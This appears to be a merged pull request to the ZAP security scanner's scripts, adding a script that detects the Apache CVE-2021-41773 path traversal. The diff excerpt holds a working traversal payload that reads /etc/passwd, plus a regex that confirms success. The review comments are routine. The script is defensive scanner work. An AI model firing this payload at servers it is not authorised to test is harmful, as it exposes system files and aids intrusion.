### PR TITLE
add: cve-2021-41773-apache-path-trav.js

### PR DESCRIPTION
**Pull request by kingthorin**
- Add new targeted script.
- Add changelog note.

Signed-off-by: kingthorin <kingthorin@users.noreply.github.com>

### CODE REVIEW

**Comment by kingthorin** [comment]
Added as targeted as: https://github.com/zaproxy/zaproxy/issues/5595 is still outstanding.

File: targeted/cve-2021-41773-apache-path-trav.js [hunk 1]
```diff
@@ -0,0 +1,93 @@
...
+    var sender = new HttpSender(connectionParams, true, 6);
+    sender.sendAndReceive(msg);
+    var status = msg.getResponseHeader().getStatusCode();
+    var rebody = msg.getResponseBody().toString();
+    var re = /root\:x\:0\:0\:root/g
+
+    // Checks to make sure that the response indicates the test was successful
+    if (status === 200 && re.test(rebody)) {
+        re.lastIndex = 0
+        var alertAttack = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd";
```
Comment (thc202) [inline targeted/cve-2021-41773-apache-path-trav.js:52]: This could be defined earlier and used in both places.

**Comment by kingthorin** [comment]
Tweaked

**Comment by thc202** [comment]
Thank you!

**Comment by ricekot** [comment]
Not a requirement, but could add relevant alert tags.

**Pull request merged**